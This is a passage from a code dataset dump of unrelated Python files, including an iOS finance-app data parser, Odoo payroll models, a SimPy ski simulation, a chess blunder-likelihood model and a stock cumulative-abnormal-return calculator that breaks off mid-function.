self._get_table_record_value(rec, \"time\")\n                monthbill.createTime = book_time\n                data = self._get_table_record_value(rec, \"data\")\n                if data:\n                    try:\n                        month_data = json.loads(data)\n                        if \"monthIncome\" in month_data:\n                            income = month_data[\"monthIncome\"]\n                            monthbill.income = self._get_actual_amount(income)\n                        if \"monthOutgo\" in month_data:\n                            outgo = month_data[\"monthOutgo\"]\n                            monthbill.outgo = self._get_actual_amount(outgo)\n                        if \"monthBalance\" in month_data:\n                            balance = month_data[\"monthBalance\"]\n                            monthbill.balance = self._get_actual_amount(balance)\n                    except Exception:\n                        pass\n                if monthbill.bookId and monthbill.createTime:\n                    self.wacai.db_insert_table_bill(monthbill)\n            except Exception as e:\n                TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n        self.wacai.db_commit()\n\n    def _get_table_record_value(self, rec, column):\n        if column in rec and (not rec[column].IsDBNull):\n            return rec[column].Value\n        else:\n            return None\n\n    def _get_actual_amount(self, amount):\n        try:\n            if amount is not None:\n                return 
float(amount) / 100\n except Exception as e:\n TraceService.Trace(TraceLevel.Error, \"{0}\".format(e))\n return 0\n\n\ndef analyze_wacaitally(node, extract_deleted, extract_source):\n pr = ParserResults()\n results = WaCaiTally(node, extract_deleted, extract_source).parse()\n if results:\n pr.Models.AddRange(results)\n pr.Build(\"挖财记账理财\")\n return pr\n\n\ndef execute(node, extract_deleted):\n return analyze_wacaitally(node, extract_deleted, False)\n","sub_path":"apple_wacaitally.py","file_name":"apple_wacaitally.py","file_ext":"py","file_size_in_byte":21119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
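The wacai parser above guards every JSON field with an `if key in data` check and stores money as integer cents, converting on the way out via `_get_actual_amount`. A minimal self-contained sketch of that defensive-extraction-plus-conversion pattern (the payload below is illustrative, not real app data):

```python
import json

def get_actual_amount(amount):
    """Convert an amount stored as integer cents into a float; fall back to 0."""
    try:
        if amount is not None:
            return float(amount) / 100
    except (TypeError, ValueError):
        pass
    return 0

raw = '{"data": {"subcategoryName": "Groceries", "amount": "1250", "type": "COST"}}'
data = json.loads(raw).get("data", {})
print(data.get("subcategoryName"))             # Groceries
print(get_actual_amount(data.get("amount")))   # 12.5
```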
+{"seq_id":"631147181","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport sys\nimport codecs\n\n\ndef main():\n args = []\n filedata = codecs.open(\"./data3.csv\",\"r\",\"utf-8\")\n try:\n for l in filedata:\n l = l.strip()\n args.append(l)\n finally:\n filedata.close()\n boxname = args.pop(0).split(\",\")\n boxname.pop(0)\n gradeint = len(args)\n detail = []\n for item in args:\n list1 = item.split(\",\")\n list1.pop(0)\n detail += list1\n\n boxa = makeBox(0,detail,gradeint)\n boxb = makeBox(1,detail,gradeint)\n boxc = makeBox(2,detail,gradeint)\n\n parselist = [prize(boxa),prize(boxb),prize(boxc)]\n\n prizedic =dict(zip(boxname,parselist))\n \n ichirobox = \"\"\n for k, v in prizedic.items():\n if v == max(prizedic.values()):\n ichirobox = k\n print(\"問題1\",ichirobox,round(100*max(prizedic.values())))\n print(\"問題2\",round(100*(1/gradeint)*(sum(prizedic.values()))))\n print(\"問題3\",round(100*(parselist[0]/sum(prizedic.values()))))\n\ndef makeBox(boxnum,detail,gradeint):\n box = []\n while boxnum < int(len(detail)):\n box.append(detail[boxnum])\n boxnum += gradeint\n return box\n\ndef prize(detail):\n allnum = 0\n for item in detail:\n allnum += int(item)\n parse = int(detail[0]) / allnum \n return parse\n\nif __name__ ==\"__main__\":\n main()\n","sub_path":"kondo/kadai6/kadai6_3.py","file_name":"kadai6_3.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271294097","text":"#coding:utf-8\nimport json\nimport requests\nfrom urllib import parse\n\n#---------数据加密解密----------\nclass DataCovertHandler(object):\n def __init__(self,url):\n self.url = url\n self.encrypt_headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n self.encrypt_api = url+\"/api/test\" # http://10.0.7.24:4444/api/test\n\n self.decryption_header = {\n \"Content-Type\": \"application/json\"\n }\n self.decryption_api =url+ \"/api/test/1\"\n\n def get_encrypt_data(self,*args,**kwargs):\n\n self.data = parse.urlencode(kwargs['kwargs'] )\n self.res = requests.post(url=self.encrypt_api,data=self.data,headers=self.encrypt_headers)\n # print(self.encrypt_api)\n return self.res.text\n\n def get_decryption_data(self,*args,**kwargs):\n self.data = kwargs['kwargs'].text.encode(encoding=\"utf-8\")\n # self.url = self.url+self.decryption_api\n # print(self.decryption_api)\n # print(self.data)\n self.res = requests.post(url=self.decryption_api,data=self.data,headers=self.decryption_header)\n return self.res.text\n\n\nif __name__ == '__main__':\n data = {\n \"appId\": \"10000\",\n \"merchantId\": \"10000\",\n \"subMerchantId\": \"10000\",\n \"openId\": \"\",\n \"flowNo\": \"20190321172841\",\n \"encoding\": \"UTF-8\",\n \"reqDateTime\": \"2019-03-21 23:59:59\",\n \"reqServiceId\": \"api.mucfc.uloan.creditApply\",\n \"bizContent\": {\n \"applyNo\": \"001\",\n \"custNo\": \"0003\",\n \"custName\": \"王秋了\",\n \"idNo\": \"110101199003074450\",\n \"mobileNo\": \"13624517834\",\n \"certValidDate\": \"\",\n \"address\": \"\",\n \"nation\": \"\",\n \"workCompany\": \"\",\n \"workCity\": \"\",\n \"workAddr\": \"\",\n \"residentCity\": \"\",\n \"residentAddr\": \"\",\n \"bioCompareRs\": \"\",\n \"suggestLimit\": \"200000.00\",\n \"applyTime\": \"2019-03-28\"\n }\n }\n\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n get_date = DataCovertHandler(\"http://10.0.7.24:4444\")\n # print(data)\n result = get_date.get_encrypt_data(kwargs=data)\n # print(result)\n\n #请求接口\n url_test = 'http://10.0.7.24:4444/api/Action'\n\n res = requests.post(url=url_test, data=result, headers=headers)\n print(res.text.encode(encoding=\"utf-8\"))\n get_decryp_date = get_date.get_decryption_data(kwargs=res)\n print(get_decryp_date)\n\n","sub_path":"ZhaoLianInterfaceTest/base/DataConvert.py","file_name":"DataConvert.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"355383057","text":"# -*- coding: utf-8 -*-\n#Python Imports\nfrom datetime import date, datetime, time\nfrom dateutil.relativedelta import relativedelta\n#Odoo Imports\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError\n\nclass VclsEntity(models.Model):\n _inherit = 'res.company'\n\n \"\"\" We just add a short name to the company object in order to use it in files naming conventions \"\"\"\n short_name = fields.Char(\n string = 'Short Name',)\n\n \"\"\" We override the field to allow a translation of the string\"\"\"\n phone = fields.Char(related='partner_id.phone', string=_(\"Phone\"), store=True, readonly=False)\n vat = fields.Char(related='partner_id.vat', string=_(\"VAT\"), readonly=False)\n siret = fields.Char(related='partner_id.siret', string=_(\"ID\"), readonly=False)\n capital = fields.Text(string=_(\"Capital\"), readonly=False, translate=True)\n\n @api.multi\n def _get_vcls_template_report_data(self):\n return {\n '_t': _,\n }\n\nclass LeaveType(models.Model):\n _inherit = 'hr.leave.type'\n \n \"\"\" We add a field to capture in which payroll export column a specific type is related to.\"\"\"\n \n payroll_type = fields.Selection([\n ('rtt', 'RTT'),\n ('cp_paid', 'CP Paid'),\n ('cp_unpaid', 'CP Unpaid'),\n ('sick', 'Sick'),\n ('other_paid','Other Paid'),\n ])\n \nclass Leave(models.Model):\n _inherit = 'hr.leave'\n \n \"\"\" We add fields to support the payroll export and have a comfortable splitting of leave if required\"\"\"\n \n trunc_start = fields.Date(\n string = 'Truncated Start',\n readonly = True,\n )\n \n trunc_end = fields.Date(\n string = 'Truncated End',\n readonly = True,\n )\n \n trunc_duration = fields.Float(\n string = 'Truncated Duration',\n readonly = True,\n )\n \n export_string = fields.Char(\n readonly = True,\n )\n \n\nclass Employee(models.Model):\n _inherit = 'hr.employee'\n \n @api.multi\n def get_leaves_distribution(self,date_start,date_end):\n \"\"\" Returns a dictionary summarizing how days in leave are distributed over the given period. \n total: the number of days in the given period,\n off: according to the resource calendar, the number of days off\n bank: number of bank holidays (i.e global leaves)\n leave: days part of user-related leaves\n weekend : saturday or sunday\n \n Called from the payroll line calculation with \n \"\"\"\n for employee in self:\n #init constants\n total = 0\n off = 0\n bank = 0\n leave = 0\n weekend = 0\n \n wt = employee.resource_calendar_id\n \n start_ord = date_start.toordinal()\n end_ord = date_end.toordinal()\n \n for d_ord in range(start_ord,end_ord+1): #1 is added to ensure the last day of the range to be taken in account\n \n d = date.fromordinal(d_ord)\n wd = d.weekday()\n \n if wd > 4 : #if saturday or sunday\n weekend += 1\n continue\n \n # we look at global leaves\n noon = datetime.combine(d, time(12, 0, 0))\n if wt.global_leave_ids.filtered(lambda r: r.date_fromnoon):\n bank += 1\n continue\n \n #the remaining days are considered as leave if the day is present in the working time.\n #if not (i.e. 
attendances is empty), then the employee is considered off\n attendances = len(wt.attendance_ids.filtered(lambda r: r.dayofweek == str(wd)))\n \n leave += attendances*0.5 #half a day per attendance\n off += 1-(attendances*0.5)\n \n \n \n \n return {\n 'total': (date_end-date_start).days + 1,\n 'weekend': weekend,\n 'bank': bank,\n 'off': off,\n 'leave': leave,\n }\n ","sub_path":"vcls-interfaces/models/payroll_overriden_classes.py","file_name":"payroll_overriden_classes.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
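`get_leaves_distribution` iterates calendar days by converting both endpoints to ordinals and walking the integer range, classifying each weekday. A self-contained cut of just that walk, counting weekend days (the full method also consults the resource calendar and global leaves):

```python
from datetime import date

def count_weekend_days(date_start, date_end):
    """Walk the inclusive day range via ordinals, as the payroll code does."""
    weekend = 0
    for d_ord in range(date_start.toordinal(), date_end.toordinal() + 1):
        if date.fromordinal(d_ord).weekday() > 4:   # 5 = Saturday, 6 = Sunday
            weekend += 1
    return weekend

print(count_weekend_days(date(2020, 1, 1), date(2020, 1, 31)))   # 8
```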
+{"seq_id":"406639859","text":"\n##############################################################################\n#\n# Copyright (c) 2003-2018 by The University of Queensland\n# http://www.uq.edu.au\n#\n# Primary Business: Queensland, Australia\n# Licensed under the Apache License, version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Development until 2012 by Earth Systems Science Computational Center (ESSCC)\n# Development 2012-2013 by School of Earth Sciences\n# Development from 2014 by Centre for Geoscience Computing (GeoComp)\n#\n##############################################################################\n\nfrom __future__ import print_function, division\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\nfrom esys.escript import *\nfrom esys.pycad import *\nfrom esys.pycad.gmsh import Design\nfrom esys.finley import MakeDomain\n\n\np0=Point(0.,0.)\np1=Point(1.,0.)\np2=Point(1.,1.)\np3=Point(0.,1.)\n\nl01=Line(p0,p1)\nl12=Line(p1,p2)\nl23=Line(p2,p3)\nl30=Line(p3,p0)\n\ns=PlaneSurface(CurveLoop(l01,l12,l23,l30))\ndes=Design(dim=2, order=1, element_size = 1, keep_files=True)\ndes.setMeshFileName(\"rec.geo\")\ndes.addItems(s)\n\ndom=MakeDomain(des)\ndom.write(\"rec.fly\")\n","sub_path":"finley/test/python/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"224392861","text":"import webbrowser\n\nclass Movie():\n\t\"\"\" This class provides a way to store movie data. \"\"\"\n\tVALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n\tdef __init__(self, title, story, poster, trailer, quote):\n\t\tself.title = title\n\t\tself.storyline = story\n\t\tself.poster_image_url = poster\n\t\tself.trailer_youtube_url = trailer\n\t\tself.quote = quote\n\n\tdef show_trailer(self):\n\t\t\"\"\" Opens a youtube video at the link provided in trailer_youtube_url. \"\"\"\n\t\twebbrowser.open(self.trailer_youtube_url)\n\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"651268210","text":"__author__ = 'tombnorwood'\n\nfrom datetime import timedelta\nfrom django.utils import timezone\n\nfrom django.core.urlresolvers import reverse\n\nfrom maui.utils import url_with_querystring\n\n\ndef round_time_up(raw_time, minute_increment):\n rounded_minute = next((minute for minute in range(0, 61, minute_increment) if minute >= raw_time.minute), 60)\n rounded_time = raw_time + timedelta(minutes=rounded_minute-raw_time.minute)\n return rounded_time\n\n\ndef round_time_down(raw_time, minute_increment):\n max_rounded_minute = ((60/minute_increment) - 1) * minute_increment\n rounded_minute = next((minute for minute in range(max_rounded_minute, -1, -1*minute_increment) if minute <= raw_time.minute), 0)\n rounded_time = raw_time - timedelta(minutes=raw_time.minute-rounded_minute)\n return rounded_time\n\n\ndef build_rounded_time_list(start_time, end_time, increment):\n list_start_time = round_time_down(start_time, increment)\n list_end_time = round_time_up(end_time, increment)\n increment_delta = timedelta(minutes=increment)\n rounded_time_list = []\n current_time = list_start_time\n while current_time <= list_end_time:\n rounded_time_list.append(current_time)\n current_time += increment_delta\n return rounded_time_list\n\n\ndef expected_inventory_url_with_querystring(product, facility, start_time, end_time):\n # convert inventory search times from timezone aware to naive datetetimes for url-ification purposes\n inventory_search_start_time_naive = start_time.replace(tzinfo=None)\n inventory_search_end_time_naive = end_time.replace(tzinfo=None)\n return url_with_querystring(reverse(\"expected_inventory\"),\n product=product.id,\n facility=facility.id,\n start_time=inventory_search_start_time_naive,\n end_time=inventory_search_end_time_naive,\n increment=30)","sub_path":"inventory/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"418775102","text":"#!/usr/bin/env python\r\n\r\nimport os, code\r\nimport pickle as pickle\r\nfrom djeval import *\r\nimport numpy as np\r\nfrom pandas import DataFrame, Series, read_pickle, concat, cut, qcut\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.externals import joblib\r\n\r\ndef sample_df(df, n_to_sample):\r\n if n_to_sample >= len(df.index.values):\r\n return df\r\n row_indexes = np.random.choice(df.index.values, n_to_sample, replace=False)\r\n return df.ix[row_indexes]\r\n\r\ndef shell():\r\n vars = globals()\r\n vars.update(locals())\r\n shell = code.InteractiveConsole(vars)\r\n shell.interact()\r\n\r\nmsg('loading chunklikes')\r\nblundermodel_dir = sys.argv[1]\r\nthing = joblib.load(blundermodel_dir + 'groups.p')\r\nelo_bins = thing[0]\r\nchunk_bounds = thing[1]\r\nfeatures = thing[2]\r\n\r\nprint('elo_bins is %s' % str(elo_bins))\r\nprint('chunk_bounds is %s' % str(chunk_bounds))\r\n\r\n# chunkmodels[elo_name, chunk_bound] = a model fit on a certain ELO\r\n# range that predicts, for a move, given that the error was < than the\r\n# previous chunk bounds, the chance that the error will be >= this\r\n# chunk bound.\r\nchunkmodels = {}\r\n\r\nnum_models = (len(elo_bins) - 1) * len(chunk_bounds)\r\nelo_names = set()\r\nmsg('Loading the %i models' % num_models)\r\nfor modelnum in range(0,num_models):\r\n thing = joblib.load('%s%i.p' % (blundermodel_dir, modelnum))\r\n elo_name = thing[0]\r\n elo_names.add(elo_name)\r\n chunk_bound = thing[1]\r\n model = thing[2]\r\n chunkmodels[elo_name, chunk_bound] = model\r\n\r\nmsg('reading movedata')\r\nmoves_df = read_pickle('/data/movedata.p')\r\nmoves_df['clipped_movergain'] = moves_df['movergain'].clip(-1e9,0)\r\nfit_df = moves_df[moves_df['bestmove_piece'] != False]\r\n\r\ntesting = False\r\nif testing:\r\n games_to_load = 10\r\n games = np.random.choice(np.arange(1,25001), games_to_load, replace=False)\r\n fit_df = fit_df[fit_df['gamenum'].isin(games)]\r\n\r\ndiagnose = False\r\nif diagnose:\r\n fit_df = sample_df(fit_df, 30)\r\n\r\nlike_colnames = []\r\nX = fit_df[features]\r\n\r\n# given a single row of sequential conditional likelihoods,\r\n# return the likelihood for the actual move that was made\r\ndef gain_likelihood(row):\r\n mg = row['movergain']\r\n prob = 1.0\r\n for ix, cb in enumerate(chunk_bounds):\r\n if mg >= cb:\r\n return prob * row.iloc[ix]\r\n else:\r\n prob = prob * (1 - row.iloc[ix])\r\n return prob\r\n \r\n\r\nfor elo_name in list(elo_names):\r\n allchunks = []\r\n for cb in chunk_bounds:\r\n model = chunkmodels[elo_name, cb]\r\n newcol_name = 'cb_' + str(elo_name.translate(None, ' ()[],')) + '_' + str(cb)\r\n like_colnames.append(newcol_name)\r\n msg('Predicting %s' % newcol_name)\r\n preds = model.predict_proba(X)\r\n preds_series = DataFrame(preds).iloc[:,1]\r\n preds_series.index = X.index\r\n preds_series.name = cb\r\n allchunks.append(preds_series)\r\n \r\n allchunks.append(fit_df['movergain'])\r\n allchunks_df = concat(allchunks, axis=1)\r\n fit_df[elo_name] = allchunks_df.apply(gain_likelihood, axis=1)\r\n\r\nif diagnose:\r\n cols_to_show = list(elo_names)\r\n cols_to_show.extend(['gamenum','side','halfply','elo','movergain'])\r\n print(fit_df[cols_to_show].transpose())\r\n\r\n# group by player-game, and combine all the likelihoods into a single\r\n# likelihood for that ELO\r\n\r\ndef exp_sum_log(foo):\r\n return np.exp(sum(np.log(foo)))\r\n\r\n# for each player-game, for each ELO range, compute product of likelihoods for all moves \r\n# in that game. 
\r\nchunkgroups = fit_df.groupby(['gamenum', 'side', 'elo'])\r\nch_aggs = []\r\n# exp(sum(log(likelihoods))) is just a cute way to do\r\n# product(likelihoods) which is *maybe* more numerically friendly\r\nfor elo_name in elo_names:\r\n ch_aggs.append( chunkgroups[elo_name].agg({elo_name: lambda x: np.exp(sum(np.log(x)))}) )\r\nch_agg_df = concat(ch_aggs, axis=1)\r\n\r\n# add up the likelihoods across all ELO ranges, add it as a new column\r\nch_agg_df = concat([ch_agg_df, ch_agg_df[list(elo_names)].sum(axis=1)], axis=1)\r\nch_agg_df.columns.values[-1] = 'sumlike'\r\n\r\n# change the per-ELO-range column to be divided by the sum of likelihoods.\r\n# now it is the probability for that ELO range\r\nfor elo_name in elo_names:\r\n ch_agg_df[elo_name] = ch_agg_df[elo_name] / ch_agg_df['sumlike']\r\nch_agg_df.drop('sumlike', axis=1, inplace=True)\r\n\r\nif testing:\r\n print(ch_agg_df)\r\n\r\njoblib.dump(ch_agg_df, '/data/chunk_aggs.p')\r\n","sub_path":"data/external/repositories_2to3/137656/blundercheck-master/combine/contest_20150323a/modeling/compute_chunklikes.py","file_name":"compute_chunklikes.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
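The `exp(sum(log(x)))` aggregation above is just a numerically friendlier `product(x)`; a tiny standalone demonstration of the same per-group likelihood product:

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({"gamenum": [1, 1, 1, 2, 2],
                   "like":    [0.9, 0.8, 0.5, 0.6, 0.7]})

# exp(sum(log(x))) == prod(x), but sums of logs resist underflow better
per_game = df.groupby("gamenum")["like"].agg(lambda x: np.exp(np.sum(np.log(x))))
print(per_game)   # gamenum 1 -> 0.36, gamenum 2 -> 0.42
```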
+{"seq_id":"100557114","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 17:31:41 2020\n\n@author: Dvyd\n\"\"\"\n\nimport simpy\nimport numpy as np\nimport random\nimport settings\nfrom esquiador import esquiador\nfrom esquiador_agrupat import esquiador_agrupat\nfrom grup_esquiador_setup import grup_esquiador_setup as gsetup\n\nclass source(object):\n def __init__(self, env):\n self.env = env\n self.action = env.process(self.run())\n \n def source(env, num, telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4):\n count_ind = 1\n count_grup = 1\n while(1):\n if (random.randint(1,10) == 1):\n env.process(gsetup.grup_esquiador_setup(env, count_grup, telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4))\n count_grup += 1\n else:\n env.process(esquiador.esquiador(env, '%d' % settings.count,telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4))\n settings.count += 1\n \n settings.remunt1_cua.append(len(remuntador1.queue))\n settings.remunt2_cua.append(len(remuntador2.queue))\n \n settings.telecadira_cua.append(len(telecadira.queue))\n \n settings.pista1_cua.append(len(pista1.queue))\n settings.pista2_cua.append(len(pista2.queue))\n settings.pista3_cua.append(len(pista3.queue))\n settings.pista4_cua.append(len(pista4.queue))\n yield env.timeout(settings.fdistribution_arribades())\n","sub_path":"source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"186406030","text":"from PIL import Image\nimport numpy as np\nimport KNN\nN = 32\n\n\n\ntraining_matrix = np.load('train_data.npy')\ntraining_data_labels = np.load('labels.npy')\n\nfor n in range(10):\n img = Image.open('C:\\\\Users\\\\Akatsuki\\\\Pictures\\\\Screenshots\\\\%d.jpg' % n) # get the picture\n img = np.array(img) # translate the pic to array\n img = img[:,:,0] # get the two dim array\n img = np.where(img==255,0,1) # modify the data in the array: 255->1, else->0\n # np.savetxt('/home/akatsuki/图片/test3.txt',img,fmt='%d') # save the 32*32 matrix\n img = KNN.cut_picture(img)\n img = KNN.strech_picture(img).reshape(N*N)\n res = KNN.classify(img, training_matrix, training_data_labels, 3)\n print('The %d predicted result is: %d' % (n,res))\n","sub_path":"DigitRecognition/hw_predict.py","file_name":"hw_predict.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"33580122","text":"from os import listdir\nimport csv\n\nmypath = 'T:courses/MSiA400/jobs/job_descriptions'\nfiles = [f for f in listdir(mypath) if f[-12:] == '_expired.csv']\nfout = open('out.csv','w')\nw = csv.writer(fout)\n\nw.writerow(['GUID','DateExpired'])\n\nfor i in files:\n with open(i) as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n w.writerow(row)\n\nfout.close()\n\n\n","sub_path":"zobrist_descriptive/code/csv2db.py","file_name":"csv2db.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"593114273","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Filename: step13_calculate_car_value\n# @Date: 31/1/2018\n# @Author: Mark Wang\n# @Email: wangyouan@gamil.com\n\nimport os\nimport multiprocessing\nimport datetime\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nimport pathos\n\nfrom constant import Constant as const\n\nff_4_factor_df = pd.read_pickle(os.path.join(const.DATA_PATH, '20180201_ff_factor_path.pkl'))\ntrading_day_series = pd.read_pickle(os.path.join(const.DATA_PATH, '20180204_business_day_list.pkl'))\n\n\ndef car(df, event_date, factor_number, period_start_days, period_end_days):\n \"\"\"\n To calculate the cumulative abnormal return.\n Input stock ticker, event date, factor number, and test interval.\n Factor number must be 1, 3 or 4. The default value of test interval is set to 5.\n @:param stock_symbol could be cusip or stock ticker\n\n if calculate CAR, period_start_days should be -2 and period_end_days should be 2\n if calculate RUN up, period_start_days should be -210 and period_end_days should be -11\n \"\"\"\n if factor_number not in {1, 3, 4}:\n # print('Factor number must be 1, 3, 4')\n return np.nan, 'Invalid factor number'\n\n if period_start_days > period_end_days:\n return np.nan, 'Invalid period days'\n\n useful_col = ['Mkt-RF', 'SMB', 'HML', 'Mom'][:factor_number]\n ff_factor_df = ff_4_factor_df[useful_col]\n\n data = pd.merge(ff_factor_df, df, right_index=True,\n left_index=True, how='inner')\n trading_days = df.index\n all_trading_days = trading_day_series.copy()\n\n if data.empty or trading_days[-1] < event_date:\n return np.nan, 'Not enough data'\n event_trading_date = all_trading_days[all_trading_days >= event_date].iloc[0]\n post_event_days = all_trading_days[all_trading_days > event_trading_date]\n before_event_days = all_trading_days[all_trading_days < event_trading_date]\n\n training_date_series = before_event_days.iloc[-210:-10]\n # start_date = before_event_days.iloc[-211]\n # data = data[data.index >= start_date]\n\n def get_detail_date(index):\n if index < 0:\n return before_event_days.iloc[index]\n else:\n return post_event_days.iloc[index - 1]\n\n event_start_date = get_detail_date(period_start_days)\n event_end_date = get_detail_date(period_end_days)\n data = data[data.index <= event_end_date]\n\n # data.loc[:, const.STOCK_RETURN] = data[const.CLOSE_PRICE].pct_change()\n\n testing_date_series = all_trading_days[all_trading_days >= event_start_date]\n testing_date_series = testing_date_series[testing_date_series <= event_end_date]\n\n real_training_date = trading_days[trading_days.isin(training_date_series)]\n real_testing_date = trading_days[trading_days.isin(testing_date_series)]\n\n if len(real_training_date) == 0 or len(real_testing_date) == 0:\n return np.nan, 'Not enough date to calculate'\n\n if len(real_training_date) <= 40:\n return np.nan, 'Not enough training data'\n\n # elif len(before_event_days) < 210:\n # training_data = data.loc[before_event_days[:-10]]\n #\n # else:\n # training_data = data.loc[before_event_days[-210:-10]]\n\n # event_start_date = get_detail_date(period_start_days)\n # event_end_date = get_detail_date(period_end_days)\n training_data = data.loc[real_training_date].dropna(subset=[const.STOCK_RETURN])\n testing_data = data.loc[real_testing_date, useful_col]\n\n try:\n # testing_data = data.loc[event_start_date:event_end_date, useful_col]\n olsmd = sm.OLS(training_data[const.STOCK_RETURN], training_data[useful_col])\n olsres = olsmd.fit()\n CAR = 
(data.loc[event_start_date:event_end_date, const.STOCK_RETURN] - olsres.predict(testing_data)).sum()\n\n return CAR, 'Calculation Succeed'\n\n except Exception as err:\n print(df.iloc[0])\n raise Exception(err)\n\n\nif __name__ == '__main__':\n # format fama french 3 factor (for record only)\n # ff_csv = pd.read_csv(os.path.join(const.DATA_PATH, 'F-F_Research_Data_Factors_daily.CSV'),\n # dtype={'date': str})\n # ff_csv['date'] = pd.to_datetime(ff_csv['date'])\n # ff_csv = ff_csv.set_index('date')\n #\n # mom_df = pd.read_csv(os.path.join(const.DATA_PATH, 'F-F_Momentum_Factor_daily.CSV'),\n # dtype={'date': str}).rename(index=str, columns={'Mom ': 'Mom'})\n # mom_df['date'] = pd.to_datetime(mom_df['date'])\n # mom_df = mom_df.set_index('date')\n #\n # ff_df = pd.merge(ff_csv, mom_df, left_index=True, right_index=True, how='inner')\n # ff_df.to_pickle(os.path.join(const.DATA_PATH, '20180201_ff_factor_path.pkl'))\n\n # format CRSP file (for record only)\n # crsp_df = pd.read_csv(os.path.join(const.DATA_PATH, 'cc_firm_data', '1986_2017_crsp_price_data.csv'),\n # usecols=['date', 'CUSIP', const.CLOSE_PRICE, 'TICKER', 'PERMNO'], dtype=str)\n # crsp_df = crsp_df.dropna(subset=['date'])\n # crsp_df.loc[:, 'date'] = pd.to_datetime(crsp_df['date'])\n # crsp_df.loc[:, const.CLOSE_PRICE] = pd.to_numeric(crsp_df[const.CLOSE_PRICE])\n # crsp_df = crsp_df.rename(index=str, columns={'CUSIP': const.CUSIP8, 'TICKER': const.TICKER})\n # crsp_df.to_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', '1986_2017_crsp_price_data.pkl'))\n print('Format crsp df')\n # crsp_df = pd.read_csv(os.path.join(const.DATA_PATH, 'cc_firm_data', '1986_2017_crsp_more_firm_info_data.csv'),\n # usecols=['date', 'CUSIP', const.STOCK_RETURN, 'TICKER', 'PERMNO'], dtype=str)\n # crsp_df = crsp_df.dropna(subset=[const.STOCK_RETURN], how='any')\n # crsp_df.loc[:, 'date'] = pd.to_datetime(crsp_df['date'])\n # crsp_df.loc[:, const.STOCK_RETURN] = pd.to_numeric(crsp_df[const.STOCK_RETURN], errors='coerce')\n # # crsp_df.loc[:, 'CFACPR'] = pd.to_numeric(crsp_df['CFACPR'], errors='coerce').fillna(1)\n # # crsp_df.loc[:, const.ADJUESTED_PRICE] = crsp_df[const.CLOSE_PRICE] / crsp_df['CFACPR']\n # crsp_df = crsp_df.rename(index=str, columns={'CUSIP': const.CUSIP8, 'TICKER': const.TICKER})\n # crsp_df.to_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', '20180205_1986_2017_crsp_price_data.pkl'))\n\n print('Load crsp file')\n crsp_df = pd.read_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', '20180205_1986_2017_crsp_price_data.pkl'))\n\n # start to calculate car\n print('Generate group')\n crsp_group = crsp_df.groupby('PERMNO')\n\n\n def format_crsp_df_and_calculate_car(df):\n # cusip = df.iloc[0][const.CUSIP8]\n permno = df.iloc[0]['PERMNO']\n tmp_df = df.copy()\n # try:\n # tmp_df.loc[:, 'date'] = pd.to_datetime(tmp_df['date'])\n tmp_df = tmp_df.set_index('date').sort_index(ascending=True)\n tmp_df.loc[:, const.STOCK_RETURN] = pd.to_numeric(tmp_df[const.STOCK_RETURN])\n # tmp_df = tmp_df.dropna(subset=[const.CLOSE_PRICE])\n\n # tmp_df.loc[:, const.CLOSE_PRICE] = tmp_df[const.CLOSE_PRICE].apply(abs)\n # tmp_df.loc[:, const.STOCK_RETURN] = stock_return_series\n tmp_df.to_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', 'crsp_permno_sep', '{}.pkl'.format(permno)))\n\n # stock_return_series = stock_return_series.dropna()\n result_df = pd.DataFrame(columns=[const.YEAR, const.CAR_1, const.CAR_3, const.CAR_4])\n # if stock_return_series.empty:\n # return result_df\n start_year = tmp_df.index[0].year\n if 